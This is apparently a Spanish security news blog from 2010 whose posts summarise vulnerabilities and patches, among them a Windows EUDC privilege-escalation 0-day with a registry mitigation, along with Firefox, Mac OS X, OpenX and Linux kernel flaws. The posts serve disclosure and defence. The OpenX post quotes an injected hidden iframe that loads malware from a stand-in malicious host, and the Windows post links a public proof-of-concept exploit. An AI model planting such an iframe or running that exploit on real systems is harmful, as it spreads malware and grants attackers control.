lunes, 29 de noviembre de 2010
0 day: Elevación de privilegios en Microsoft Windows
12:44 | 
Publicado por
Tony Orozco |
Se ha públicado un nuevo 0 day en Microsoft Windows que permite a un usuario local obtener privilegios de SYSTEM (control total sobre el sistema) eludiendo cualquier control de usuario.
Los detalles técnicos se han hecho públicos, así como el código fuente y el programa necesarios para aprovechar el fallo. El exploit se aprovecha de la forma en la que el controlador win32k.sys procesa ciertos valores del registro. En concreto, el exploit manipula el valor SystemDefaultUEDCFont del registro y activa el soporte para EUDC (End-User-Defined-Characters) a través de la función EnableEUDC.
Esto quiere decir que el atacante debe crear una clave en el registro donde un usuario no administrador tiene privilegios para hacerlo. Luego intenta leerla, provoca el fallo en el driver y obtiene los privilegios.
La prueba de concepto utiliza esta clave:
HKEY_USERS\[SID DEL USUARIO]\EUDC
La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008 totalmente parcheados. Tanto si el usuario pertenece al grupo de usuarios como al de administradores (incluso con la protección UAC activa), se obtendrán privilegios sin ningún tipo de advertencia por parte de Windows y por supuesto, sin necesidad de conocer la contraseña.
En Windows XP, la prueba de concepto no funciona (no existe por defecto esa rama del registro) pero es posible que la vulnerabilidad también le afecte. La prueba de concepto no es detectada por ningún motor en estos momentos:
VirusTotal - Free Online Virus, Malware and URL Scanner
Para que este fallo fuese aprovechado por un atacante o malware, primero debería acceder al sistema por cualquier otro medio y encontrarse con que no puede realizar los cambios que desea a causa de los permisos. Realmente, este no suele ser un impedimento para el malware masivo (puesto que el usuario medio suele o bien obviar el UAC o bien deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí que es posible que este fallo sea usado en ataques dirigidos o entornos profesionales, donde los usuarios de escritorio suelen tener privilegios limitados en el dominio.
Con este fallo, ya son dos problemas de elevación de privilegios que Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo del famoso troyano Stuxnet. A través del programador de tareas, el
malware era capaz de elevar privilegios en el equipo infectado. Hace algunos días los detalles de esta vulnerabilidad también se hicieron públicos.
El equipo de seguridad de Microsoft ha declarado en su twitter que está investigando el asunto. Un método para prevenir el problema hasta que exista parche oficial es limitar los permisos del usuario en la rama
HKEY_USERS\[SID DEL USUARIO]\EUDC
En el registro, se debe negar el permiso de escritura a los usuarios no administradores. Gráficamente, es sencillo (localizar el SID del usuario, botón derecho sobre la rama del registro y denegar).
Para automatizar el proceso, aconsejamos (aunque puede tener efectos secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una herramienta oficial de Microsoft descargable desde:
Download details: SubInACL (SubInACL.exe)
Una vez instalada, localizar el SID del usuario (normalmente terminará en 1000) y el nombre de máquina y usuario con el comando:
whoami /user:
INFORMACIÓN DE USUARIO
----------------------
Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000
y ejecutar:
subinacl.exe /subkeyreg "HKEY_USERS\ S-1-5-21-123456789-12345677889-123445678990-1000\EUDC /deny= ordenador\usuario=w
Esto evitará que el usuario pueda escribir en esa rama y por tanto la prueba de concepto no funcionará. Repetir para el resto de usuarios en el equipo si los hubiera.
Más información:
POC:
http://www.exploit-db.com/sploits/uacpoc.zip
We 're investigating public PoC for a local EoP vuln requiring an account on the target system
Security Response (msftsecresponse) on Twitter
Los detalles técnicos se han hecho públicos, así como el código fuente y el programa necesarios para aprovechar el fallo. El exploit se aprovecha de la forma en la que el controlador win32k.sys procesa ciertos valores del registro. En concreto, el exploit manipula el valor SystemDefaultUEDCFont del registro y activa el soporte para EUDC (End-User-Defined-Characters) a través de la función EnableEUDC.
Esto quiere decir que el atacante debe crear una clave en el registro donde un usuario no administrador tiene privilegios para hacerlo. Luego intenta leerla, provoca el fallo en el driver y obtiene los privilegios.
La prueba de concepto utiliza esta clave:
HKEY_USERS\[SID DEL USUARIO]\EUDC
La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008 totalmente parcheados. Tanto si el usuario pertenece al grupo de usuarios como al de administradores (incluso con la protección UAC activa), se obtendrán privilegios sin ningún tipo de advertencia por parte de Windows y por supuesto, sin necesidad de conocer la contraseña.
En Windows XP, la prueba de concepto no funciona (no existe por defecto esa rama del registro) pero es posible que la vulnerabilidad también le afecte. La prueba de concepto no es detectada por ningún motor en estos momentos:
VirusTotal - Free Online Virus, Malware and URL Scanner
Para que este fallo fuese aprovechado por un atacante o malware, primero debería acceder al sistema por cualquier otro medio y encontrarse con que no puede realizar los cambios que desea a causa de los permisos. Realmente, este no suele ser un impedimento para el malware masivo (puesto que el usuario medio suele o bien obviar el UAC o bien deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí que es posible que este fallo sea usado en ataques dirigidos o entornos profesionales, donde los usuarios de escritorio suelen tener privilegios limitados en el dominio.
Con este fallo, ya son dos problemas de elevación de privilegios que Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo del famoso troyano Stuxnet. A través del programador de tareas, el
malware era capaz de elevar privilegios en el equipo infectado. Hace algunos días los detalles de esta vulnerabilidad también se hicieron públicos.
El equipo de seguridad de Microsoft ha declarado en su twitter que está investigando el asunto. Un método para prevenir el problema hasta que exista parche oficial es limitar los permisos del usuario en la rama
HKEY_USERS\[SID DEL USUARIO]\EUDC
En el registro, se debe negar el permiso de escritura a los usuarios no administradores. Gráficamente, es sencillo (localizar el SID del usuario, botón derecho sobre la rama del registro y denegar).
Para automatizar el proceso, aconsejamos (aunque puede tener efectos secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una herramienta oficial de Microsoft descargable desde:
Download details: SubInACL (SubInACL.exe)
Una vez instalada, localizar el SID del usuario (normalmente terminará en 1000) y el nombre de máquina y usuario con el comando:
whoami /user:
INFORMACIÓN DE USUARIO
----------------------
Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000
y ejecutar:
subinacl.exe /subkeyreg "HKEY_USERS\ S-1-5-21-123456789-12345677889-123445678990-1000\EUDC /deny= ordenador\usuario=w
Esto evitará que el usuario pueda escribir en esa rama y por tanto la prueba de concepto no funcionará. Repetir para el resto de usuarios en el equipo si los hubiera.
Más información:
POC:
http://www.exploit-db.com/sploits/uacpoc.zip
We 're investigating public PoC for a local EoP vuln requiring an account on the target system
Security Response (msftsecresponse) on Twitter
Se han anunciado dos vulnerabilidades en Wireshark versiones 1.4.0 a 1.4.1 y 1.2.0 a 1.2.12.
Se han anunciado dos vulnerabilidades en Wireshark versiones 1.4.0 a 1.4.1 y 1.2.0 a 1.2.12.
Wireshark (aún conocido como Ethereal, su nombre anterior) es una aplicación de auditoría orientada al análisis de tráfico en redes. Su popularidad es muy elevada, puesto que soporta una gran cantidad de protocolos y es de fácil manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, así como en Microsoft Windows.
El primero de los problemas, reside en un desbordamiento de búfer en el disector LDSS al procesar líneas de resumen de gran longitud, un atacante podría aprovechar este problema para ejecutar código arbitrario. La segunda vulnerabilidad es una denegación de servicio debida a un bucle infinito en el disector ZigBee ZCL.
Se recomienda actualizar a Wireshark 1.4.2 o 1.2.13 desde:
Wireshark Download
Más información:
LDSS vulnerability in Wireshark® version 1.2.0
Wireshark wnpa-sec-2010-13
LDSS and ZigBee ZCL vulnerabilities in Wireshark® version 1.4.0
Wireshark wnpa-sec-2010-14
lunes, 15 de noviembre de 2010
0-day en el navegador Mozilla Firefox explotado activamente
Se ha detectado la explotación activa de una vulnerabilidad desconocida que afecta al navegador Mozilla Firefox en las versiones 3.5 y 3.6.
El 0-day fue descubierto por el equipo de Trend-Micro, el cual informó que el sitio web oficial de los Premios Nobel había sido comprometido y que los atacantes habrían insertado un script PHP malicioso, denominado "JS_NINDYA.A", con objeto de propagar malware.
El script determina si va a explotar o no la vulnerabilidad a través de la lectura del campo User-agent, del cual extrae la información sobre el navegador y versión, además del sistema operativo. En caso de explotarla
exitosamente procede a descargar el troyano BKDR_NINDYA.A al ordenador de la víctima.
Dicho script explota la mencionada vulnerabilidad y aunque afecta al navegador Firefox en las versiones 3.5 y 3.6, tan solo intenta su explotación en la versión 3.6 sobre Windows en versiones anteriores a Vista.
Mozilla está trabajando en una solución para esta vulnerabilidad, por lo que en breve podría estar disponible una nueva versión del navegador. Recomiendan, mientras tanto, el uso de la extensión NoScript para mitigar el riesgo de exposición hasta que la solución vea la luz.
Más información:
El 0-day fue descubierto por el equipo de Trend-Micro, el cual informó que el sitio web oficial de los Premios Nobel había sido comprometido y que los atacantes habrían insertado un script PHP malicioso, denominado "JS_NINDYA.A", con objeto de propagar malware.
El script determina si va a explotar o no la vulnerabilidad a través de la lectura del campo User-agent, del cual extrae la información sobre el navegador y versión, además del sistema operativo. En caso de explotarla
exitosamente procede a descargar el troyano BKDR_NINDYA.A al ordenador de la víctima.
Dicho script explota la mencionada vulnerabilidad y aunque afecta al navegador Firefox en las versiones 3.5 y 3.6, tan solo intenta su explotación en la versión 3.6 sobre Windows en versiones anteriores a Vista.
Mozilla está trabajando en una solución para esta vulnerabilidad, por lo que en breve podría estar disponible una nueva versión del navegador. Recomiendan, mientras tanto, el uso de la extensión NoScript para mitigar el riesgo de exposición hasta que la solución vea la luz.
Más información:
Actualización de seguridad para Apple Mac OS X, no soluciona un grave fallo
NOTICIA IMPORTANTE PARA TODOS LOS QUE POSEEMOS UN MAC O UN HIBRIDO
Actualización de seguridad para Apple Mac OS X, no soluciona un grave fallo y "rompe" algunos sistemas cifrados
Apple ha lanzado recientemente la versión 10.6.5 de su sistema operativo Mac OS X junto con una nueva actualización de seguridad. Se ven afectados las versiones Mac OS X 10.6.x y 10.5.8 y se resuelven un total de 134 vulnerabilidades. Deja sin parchear un grave fallo de seguridad y sin arrancar algunos sistemas cifrados.
Esta es la séptima actualización del año (con el código 2010-007). Los componentes y software afectados son: AFP Server, Apache mod_perl, Apache, AppKit, ATS, CFNetwork, CoreGraphics, CoreText, CUPS, Directory Services, diskdev_cmds, Disk Images, el plug-in Flash Player, gzip, Image Capture, ImageIO, Image RAW, Kernel, MySQL, neon, Networking, OpenLDAP, OpenSSL, Password Server, PHP, Printing, python, QuickLook, QuickTime, Safari RSS, Time Machine, Wiki Server, X11 y xar.
Las actualizaciones pueden ser instaladas a través de la funcionalidad de actualización (Software Update) de Mac OS X o, según versión y plataforma, descargándolas directamente desde:
Apple - Support - Downloads
Hay que tener en cuenta que para la versión 10.5, se ha dejado sin parchear un grave fallo de seguridad que permite la ejecución de código. Core Security, harta de que Apple le prometa que va a solucionar el fallo pero no sea parcheado, ha hecho públicos los detalles. La versión 10.6 no es vulnerable.
Por otro lado, aunque ya se ha proporcionado una solución oficial, los usuarios de la opción de cifrado completo de disco de la utilidad de seguridad PGP de Symantec se han llevado una "sorpresa" al actualizar a
la versión 10.6.5. Todos los equipos que tenían el disco cifrado, tras aplicar la actualización de seguridad que Apple 10.6.5 no eran capaces de arrancar.
Más información:
Si tienes cifrado el disco con PGP no actualices a 10.6.5Seguridad Apple: Si tienes cifrado el disco con PGP no actualices a 10.6.5
Mac OS X security flaw publicized after Apple fails to patchMac OS X security flaw publicized after Apple fails to patch | ZDNet
APPLE-SA-2010-11-10-1 Mac OS X v10.6.5 and Security Update 2010-007APPLE-SA-2010-11-10-1 Mac OS X v10.6.5 and Security Update 2010-007
Más de 350 fallos en el Kernel de Android
Recientemente ha sido publicado el informe "Coverity Scan 2010 Open Source Integrity Report"; este informe es desarrollado por la empresa Coverity y el departamento de seguridad nacional de los EE.UU. y vienen desarrollando esta labor desde 2006. Este informe se realiza sobre programas de código abierto y este año le ha tocado el turno al kernel de Android.
Este estudio ha sido realizado sobre el kernel 2.6.32 de Android (Froyo), en concreto sobre un terminal "HTC Droid Incredible", el estudio matiza que alguno de los fallos puede que no afecten a todas las versiones del kernel de Android; dada la fragmentación existente en Android. Esto es causado debido a que algunas de las piezas del sistema dependen directamente de los fabricantes del Hardware.
Esta investigación ha descubierto 359 fallos de seguridad, 88 de ellos han sido clasificados como de alto riesgo y 271 como riesgo medio. Para detectar los errores se ha empleado un analizador de código estático, y como en toda auditoría estática de código se detectaron 46 falsos positivos durante la investigación de los posibles errores.
Como riesgo elevado se han reportado errores de corrupción de memoria, acceso ilegal a memoria, pérdida de recursos y errores al inicializar variables. Estos errores permiten ejecutar código arbitrario o el acceso
al GPS sin autenticación, entre otros posibles impactos.
Entre los problemas de riesgo medio encontramos errores de implementación de API, errores en el control de flujo, en los manejadores o referencias a punteros a nulos. Estos fallos causan una denegación de servicio haciendo que el terminal se quede bloqueado.
Los componentes donde se han encontrado los fallos han sido, por número de errores: Fs, especificaciones de Android, Net, Drivers, Kernel y Arch entre otros. Destacar que la mayoría de fallos críticos se encuentran en las especificaciones de Android.
Los detalles de cada vulnerabilidad no han sido publicados, dado el impacto de estos y serán publicadas cuando estén disponibles los parches. Alguno de estos fallos puede que afecte a versiones inferiores
de Android.
Más información:
Coverity Release:
domingo, 24 de octubre de 2010
Ejecución remota de código en BlackBerry Enterprise Server
Se ha anunciado una vulnerabilidad en BlackBerry Enterprise Server, que podría permitir a un atacante remoto ejecutar código arbitrario con enviar un archivo con un adjunto malicioso.
De nuevo el problema reside en el tratamiento de archivos pdf, algo que viene repitiéndose de forma habitual en los sistemas de Research In Motion (RIM), empresa responsable de BlackBerry.
Los fallos se dan en el servicio de archivos adjuntos de BlackBerry Enterprise Server 4.1.7, 5.0.0, 5.0.1 y 5.0.2. Un atacante podría, a través de un archivo PDF especialmente manipulado, enviado como adjunto
en un mensaje de forma que al abrirlo en el dispositivo móvil, se ejecute el código malicioso en el servidor que aloja el servicio de adjuntos.
Se han publicado actualizaciones para corregir este problema. Dada la diversidad de versiones y sistemas de correo afectados (Microsoft Exchange, IBM Lotus Domino y Novell GroupWise)
De nuevo el problema reside en el tratamiento de archivos pdf, algo que viene repitiéndose de forma habitual en los sistemas de Research In Motion (RIM), empresa responsable de BlackBerry.
Los fallos se dan en el servicio de archivos adjuntos de BlackBerry Enterprise Server 4.1.7, 5.0.0, 5.0.1 y 5.0.2. Un atacante podría, a través de un archivo PDF especialmente manipulado, enviado como adjunto
en un mensaje de forma que al abrirlo en el dispositivo móvil, se ejecute el código malicioso en el servidor que aloja el servicio de adjuntos.
Se han publicado actualizaciones para corregir este problema. Dada la diversidad de versiones y sistemas de correo afectados (Microsoft Exchange, IBM Lotus Domino y Novell GroupWise)
Más información:
Vulnerability in the PDF distiller of the BlackBerry Attachment Service for the BlackBerry Enterprise Server
KB24547-Vulnerability in the PDF distiller of the BlackBerry Attachment Service for the BlackBerry Enterprise Server
Mozilla corrige 12 vulnerabilidades en la nueva versión de Firefox
Cinco de las vulnerabilidades han sido calificadas como críticas y pueden ser aprovechadas para diversos fines como ataques de “Cross-site scripting” (XSS), provocar que el navegador deje de responder y ejecutar código malicioso.
Así mismo, se ha corregido una falla relacionado con el problema de carga de librerías DLL en Windows que puede permitir a un atacante instalar malware.
Dichas vulnerabilidades también han sido resueltas en otros dos productos de Mozilla: Thunderbird y SeaMonkey. Así que les recomendamos tanto a los usuarios de Firefox como de estas dos aplicaciones actualizar cuanto antes.
Se corrigen siete vulnerabilidades "altamente críticas" en RealPlayer
Secunia ha calificado estas vulnerabilidades como “altamente críticas” y señala que pueden ser explotadas por atacantes para comprometer el sistema del usuario. Según el informe de seguridad de RealNetworks, hasta el momento no se ha reportado que las vulnerabilidades estén siendo explotadas activamente.
Es muy recomendable que todos los usuarios de esta aplicación actualicen lo más pronto posible. Las nuevas versiones disponibles y que no son vulnerables: Real Player SP 1.1.5 y Real Player Enterprise 2.1.3 para usuarios de Windows, RealPlayer 1.0.0.1444 para Mac OS X y RealPlayer 11.0.2.1744 para Linux.
El sitio web de Kaspkersky fue infectado con software malicioso
Por medio de diversos foros, algunos usuarios comenzaron a reportar que al intentar descargar una solución de seguridad de Kaspkersky eran enviados a una página externa en la que se ofrecían antivirus falsos (los llamados rogueware).
En un principio un portavoz de Kaspkersky negó los reportes, pero poco después la firma confirmó que la web fue comprometido el domingo por medio de una vulnerabilidad en una de las aplicaciones que utilizan para administrar el sitio. No obstante, señalaron que el problema sólo duro unas ‘tres horas y media’.
Kaspkersky asegura que ningún momento los datos de los usuarios corrieron peligro, así que parece que el problema no fue a mayores. Por desgracia, no es la primera vez que les pasa algo así, pues hace un año un hacker reveló una falla en el sitio web de la compañía que permitía tener acceso a la base de datos.
Adobe Reader X incluirá un modo seguro
Adobe está decidida a ponerle un freno a las fallas de seguridad que sufre su aplicación Reader. La compañía ha anunciado que en noviembre será lanzada la nueva versión X de la gama de productos Acrobat, la cual además de incluir nuevas funciones implementará un modo de seguridad basado en “sandbox”.
“Sandbox” es un sistema de seguridad que permite al software ejecutarse en un entorno seguro en el que algunas funciones como modificar datos o instalar o eliminar archivos del sistema están limitadas. Básicamente, esto puede prevenir la ejecución de código malicioso al momento de abrir un documento .PDF.
Pero esto no significa que ahora Reader será invulnerable. De hecho, Adobe ha explicado que este entorno de seguridad tiene algunas limitaciones y, entre otras coas, no ofrece protección para acceso no autorizado de lectura al sistema de archivos o al registro. Además, debido a que se basa en muchas características de seguridad propias del sistema en el que se ejecuta, el sandbox puede ser atacado a través de errores o una configuración insegura del sistema operativo.
Adobe Reader es actualmente una de las aplicaciones más atacados, y esta capa de seguridad ofrecerá mayor protección a los usuarios. La nueva versión X de Reader y los productos Acrobat estarán disponible durante el próximo mes.
Nueva actualización de Opera cierra múltiples fallas de seguridad
Opera, uno de los navegadores más populares, se ha actualizado a la versión 10.6.3. Esta actualización, además de solucionar algunas cuestiones de compatibilidad y fallas de estabilidad, se encarga de cerrar 5 vulnerabilidades.
Entre las correcciones se incluye una vulnerabilidad “cross-site scripting” (XSS) calificada como “crítica” que permite a un atacante ejecutar código y cambiar los ajustes de configuración de Opera. Otra vulnerabilidad de impacto ‘moderado’ puede ser aprovechada para robar información por medio de archivos CSS.
Opera 10.6.3 está disponible para Windows, Mac OS X y Linux, así que les recomendamos a todos los usuarios de actualizar lo más pronto posible.
domingo, 17 de octubre de 2010
Desbordamientos de búfer en Winamp
Se han anunciado múltiples vulnerabilidades en Winamp (versiones 5.581 y anteriores). Un atacante remoto podría emplear estos problemas para comprometer los sistemas vulnerables.
Winamp es seguramente el reproductor de archivos multimedia más famoso para plataformas Windows. Entre sus cualidades está el soportar múltiples formatos, ser ligero, aceptar infinidad de plugins y la posibilidad de descarga de versiones gratuitas.
Los problemas residen en desbordamientos de búfer y enteros al procesar archivos MKV, hmp y MTM mal construidos. Los problemas corregidos residen en 'in_mkv', 'in_mod', 'in_nsv' y 'in_midi'. Un atacante podría provocar la ejecución de código arbitrario si un usuario abre un archivo especialmente manipulado.
Actualmente no hay corrección para este problema, por lo que se recomienda evitar reproducir cualquiera de los archivos afectados.
Más información:
Aviso Original
Winamp es seguramente el reproductor de archivos multimedia más famoso para plataformas Windows. Entre sus cualidades está el soportar múltiples formatos, ser ligero, aceptar infinidad de plugins y la posibilidad de descarga de versiones gratuitas.
Los problemas residen en desbordamientos de búfer y enteros al procesar archivos MKV, hmp y MTM mal construidos. Los problemas corregidos residen en 'in_mkv', 'in_mod', 'in_nsv' y 'in_midi'. Un atacante podría provocar la ejecución de código arbitrario si un usuario abre un archivo especialmente manipulado.
Actualmente no hay corrección para este problema, por lo que se recomienda evitar reproducir cualquiera de los archivos afectados.
Más información:
Aviso Original
domingo, 10 de octubre de 2010
Actualizaciones de seguridad para Adobe Reader y Acrobat
Adobe ha publicado una actualización para corregir 23 vulnerabilidades en Adobe Reader y Acrobat en diferentes plataformas, que podrían permitir a un atacante ejecutar código con los permisos con los que se lance la aplicación afectada.
Las versiones afectadas son Adobe Reader 9.3.4 (y anteriores) para Windows, Macintosh y UNIX; Adobe Acrobat 9.3.4 (y anteriores) para Windows y Macintosh; y Adobe Reader 8.2.4 (y anteriores) y Adobe Acrobat 8.2.4 (y anteriores) para Windows y Macintosh.
Las vulnerabilidades anunciadas residen en 23 problemas diferentes, la mayoría de ellos críticos que residen en corrupción de memoria, tratamiento de imágenes o tratamiento de entradas que pueden dar
lugar a ejecución de código arbitrario.
Adobe recomienda a los usuarios de Reader y Acrobat la actualizaciones a las versiones recientemente publicadas empleando la opción de actualización automática de los productos o bien descargándolas desde
la propia web de Adobe.
Adobe Downloads
Adobe - Descarga de Adobe Reader - Todas las versiones
jueves, 23 de septiembre de 2010
Error de regresión en el kernel Linux
El investigador de seguridad Ben Hawkes se hallaba diseccionando el modo de compatibilidad del kernel Linux de 64 bits para aplicaciones de 32 bits cuando dio con algo que llamó su atención:
En el 2007 fue publicada una vulnerabilidad que permitía elevar privilegios en el kernel Linux de 64 bits. El problema residía en el archivo 'arch/x86_64/ia32/ia32entry.S', dentro de un procedimiento para emular las llamadas de la arquitectura de 32 bits.
Dicho procedimiento usa el registro eax como índice a una tabla donde están las llamadas del sistema correspondientes a IA32 y comprueba que eax está dentro de los límites de la tabla. Si es así llama a la macro IA32_ARG_FIXUP que realizará una conversión de registros de 64 bits a registros de 32.
Finalmente se realiza la llamada a través de ia32_sys_call_table pero usando el registro 'rax' completo y sin comprobar. Esto permite, si podemos controlar 'rax', efectuar llamadas a direcciones fuera de la tabla de llamadas y con privilegios del sistema (elevación de privilegios).
Dicho fallo, originalmente descubierto por Wojciech Purczynski, fue corregido añadiendo la macro LOAD_ARGS32 para cargar de manera segura los registros previniendo su explotación. En su día fue publicado el exploit correspondiente y se asignó el CVE-2007-4573 a la vulnerabilidad.
Lo que Ben observó fue que en las nuevas versiones del kernel, los desarroladores habían eliminado una linea concreta de la macro LOAD_ARGS32: "movl \offset+72(%rsp),%eax".
Curiosamente se trata de la que efectuaba una asignación segura del valor de 'eax'. Esto puede verse en el commit correspondiente del repositorio del kernel.
De nuevo la vulnerabilidad estaba viva. Ben se lo comunicó a Robert Swiecki, quien creo el exploit original y el cual sólo tuvo que modificarlo para que fuese funcional una vez más.
El fallo ha sido nuevamente parcheado y asignado el CVE-2010-3301.
Más información:
Linux Compat Vulns
Isec 0025 Syscall Emulation
CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
domingo, 12 de septiembre de 2010
Malware a través de OpenX y 2 soluciones para evitarlo
Existe una vulnerabilidad en algunas versiones de OpenX 2.8.x que posibilita inyectar código en la base de datos de las campañas publicitarias. En este caso, se detectó que en el campo “append” fue insertado el siguiente iframe:
“<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>”
Este código se sirve junto con los anuncios de OpenX, y tiene la finalidad de descargar malware en el equipo del usuario. Lo más recomendable es actualizar a la última versión de OpenX, la cual al parecer cierra la vulnerabilidad, pero si por cualquier motivo no les es posible, pueden recurrir a estas dos soluciones:
1.Verificar constantemente que el campo “append” no tenga código malicioso. No es algo muy efectivo si se hace de forma manual, pero se puede crear un script en cronjob que verifique cada cierto tiempo dicho campo y que nos alerte en caso de que encuentre código malicioso, de este modo podremos eliminarlo lo más pronto posible de la base de datos.
2.En caso de que no se utilice, inhabilitar el campo “append”. Para esto únicamente debemos editar el archivo “/www/delivery/ajs.php” de nuestra instalación de OpenX y en la línea 3227 reemplazar el fragmento de código “!empty($aBanner['append']) ? $aBanner['append'] : ”” por “$append=”";“.
Esto no corrige la vulnerabilidad, pero por lo menos evita que se siga sirviendo el código malicioso a través de los anuncios de publicidad. En los foros de OpenX se puede ver que muchos usuarios se han visto afectados por este problema, así que si usan esta herramienta les recomendamos que tomen sus precauciones.
Mozilla corrige múltiples fallas de seguridad en Firefox
Casi al mismo tiempo que Safari, Mozilla ha lanzado una nueva actualización de Firefox para solucionar múltiples vulnerabilidades, entre ellas el problema relacionado a la carga de librerías DLL que afecta a numerosas aplicaciones para Windows y que, precisamente, Safari también solucionó en su última entrega.
Firefox 3.6.9 se encarga de cerrar 15 vulnerabilidades de seguridad, la mayoría han sido catalogadas por el equipo de Mozilla como “críticas” y pueden ser aprovechadas para causar el cuelgue del navegador y ejecutar código arbitrario.
Además de dichas correcciones, se ha implementado soporte para “X-Frame-Options“, lo cual es utilizado para evitar los llamados ataques clickjacking que tan comunes se han vuelto. Navegadores como Internet Explorer 8, Safari, Chrome y Opera ya soportaban esta característica, y Firefox era el que faltaba.
La nueva actualización de Firefox ya se puede descargar desde el sitio web de Mozilla. Si todavía no les aparece la notificación para actualizar de forma automática, sólo hay que dirigirse al menú “Ayuda” – “Buscar Actualizaciones”.
domingo, 5 de septiembre de 2010
El equipo de Google ha lanzado la versión 6.0.472.53 de su navegador Chrome. Esta actualización, además de incluir nuevas características y mejoras en cuanto a velocidad, se encarga de solucionar 17 de vulnerabilidades de seguridad.
De momento Google ha preferido mantener en privado los detalles de las fallas corregidas, pero cabe destacar que casi la mitad han sido catalogadas como de prioridad “alta”. La actualización se ha lanzado en el canal ‘estable’ y ‘beta’ de Google Chrome y afecta a los usuarios de Windows, Mac OS X y Linux.
Dichas vulnerabilidades le han “costado” a Google $4,337 dólares, pues fue lo que entregó en total como parte de su famoso programa de recompensas.
Google Chrome 6.0 ya está disponible en su página web oficial, así que les recomendamos descargarlo cuanto antes. También pueden actualizar desde el navegador haciendo clic en herramientas, ayuda y acerca de Google Chrome.
Apple soluciona múltiples fallos de seguridad en Mac OS X
Apple ha lanzado para los usuarios de Mac OS X 10.5 y 10.6 la Actualización de Seguridad 2010-05. Esta actualización soluciona múltiples vulnerabilidades de seguridad que afectan al sistema y algunos componentes de terceros.
Entre las correcciones, se incluyen vulnerabilidades graves que permite ejecutar código malicioso al abrir un documento, una imagen .PNG o un archivo PDF que haya sido maliciosamente modificado. También se ha actualizado la versión de PHP y ClamAV para solventar distintos agujeros de ejecución de código.
La Actualización de Seguridad 2010-05 se puede descargar desde la página web de Apple o por medio de “Actualización de Software” de OS X. Es importante que los usuarios de Leopard y Snow Leopard actualicen lo más pronto posible.
Apple prepara un parche para la vulnerabilidad Jailbreak de iOS
Tal parece que en breve los usuarios de iPhone, iPod Touch y iPad recibirán una nueva actualización de iOS. Sin embargo, no será para agregar novedades, sino para corregir la grave vulnerabilidad que permite la ejecución de código.
Natalie Kerris, portavoz de Apple, dijo a USAToday que ya tienen terminado un parche para corregir la vulnerabilidad, y aunque todavía no han determinado una fecha para su lanzamiento, se espera que esté disponible dentro de unos días.
La vulnerabilidad en cuestión, que se debe a un error en la forma en que el sistema gestiona las fuentes CFF, actualmente está siendo aprovechada para aplicar el famoso “Jailbreak” en iOS, que no es otra cosa que la posibilidad de ejecutar código no autorizado de Apple. Sin embargo, también podría ser aprovechada para muchos otros fines, como ejecutar código malicioso en el sistema operativo tan sólo con abrir un archivo PDF o visitar una página web.
Se trata de una problema de seguridad muy grave, pero por desgracia, ha llamado más la atención la posibilidad de hacer Jailbreak que el problema como tal.
Etiquetas:
Actualizacion,
Apple,
iPad,
iPhone,
iPod Touch,
Jailbraek,
Vulnerabilidad iOS
|
0
comentarios
Actualización del kernel para SuSE Linux Enterprise 10
SuSE ha publicado la actualización del kernel para SuSE Linux Enterprise Server y Desktop en su versión 10 SP3 en la que se corrigen dos vulnerabilidades de denegación de servicio.
Uno de los problemas corregidos en que la pila de procesos puede crecer hasta sobreescribir otras áreas mapeadas, esto podría conllevar la terminación del proceso.
Un segundo problema, consiste en una denegación de servicio del servidor NFSv4 ante peticiones específicamente construidas.
Se recomienda actualizar a la última versión del kernel, disponible a través de la herramienta automática YaST.
Más información:
[security-announce] SUSE Security Announcement: kernel (SUSE-SA:2010:038)
jueves, 26 de agosto de 2010
Ejecucion Remota De Codigo A Traves Del Reproductor De WebEX
Se ha anunciado una vulnerabilidad en el reproductor de Cisco WebEx, que podría permitir a un atacante remoto ejecutar código arbitrario en los sistemas afectados.
WebEx es un sistema para la realización de reuniones online como si se llevaran a cabo de forma presencial, con la posibilidad de compartir documentos, ofrecer presentaciones, mostrar productos y servicios, etc.
El problema reside en el tratamiento de archivos ARF específicamente creados, de tal forma que podrían provocar un desbordamiento de búfer basado en pila en el sistema atacado. Esto podría permitir a un atacante la ejecución de código con los permisos del usuario.
Se publicó una actualización para el problema, por lo que se recomienda actualizar todos los reproductores de WebEx.
Más información:
Cisco WebEx Player ARF String Parsing Remote Code Execution Vulnerability
Zero Day Initiative
Vulnerabilidades Locales En EL Kernel De Linux
Se han detectado recientemente dos vulnerabilidades en el kernel Linux, en su rama 2.6.x que podrían permitir a atacantes locales provocar una denegación de servicio u obtener acceso a información en memoria.
El primero de los fallos se da a la hora de limpiar la memoria en la función 'drm_ioctl' del fichero 'drivers/gpu/drm/drm_drv.c' del controlador DRM (Direct Rendering Manager). Un atacante local podría aprovechar esto para obtener acceso a direcciones de memoria basadas en pila anteriormente liberadas, mediante el envío de llamadas al sistema especialmente manipuladas y con acceso al servidor X.
El segundo problema es un desbordamiento de enteros en la familia de sockets 'AF_CAN', en concreto en los protocolos (Controller Area Network) y BCM (Broadcast Manager). Esto podría ser aprovechado por un atacante local para elevar privilegios a través del envío de paquetes CAN especialmente manipulados.
Se recomienda aplicar las contramedidas especificadas en el apartado de más información.
Más información:
Can: add limit for nframes and clean up signed/unsigned variables
Drm: stop information leak of old kernel stack 1.
Drm: stop information leak of old kernel stack 2.
Grave Problema De Seguridad Compartido En Windows
Microsoft confirma un grave problema de seguridad "compartido" con cientos de aplicaciones de terceros
HD Moore, líder del proyecto Metasploit, destapaba hace algunos días un problema de seguridad en decenas de aplicaciones de terceros cuando eran ejecutadas sobre Windows. Aunque la raíz del problema es, en realidad, una programación insegura de las aplicaciones, dada la magnitud del problema Microsoft ha publicado un aviso de seguridad con instrucciones para mitigar el fallo.
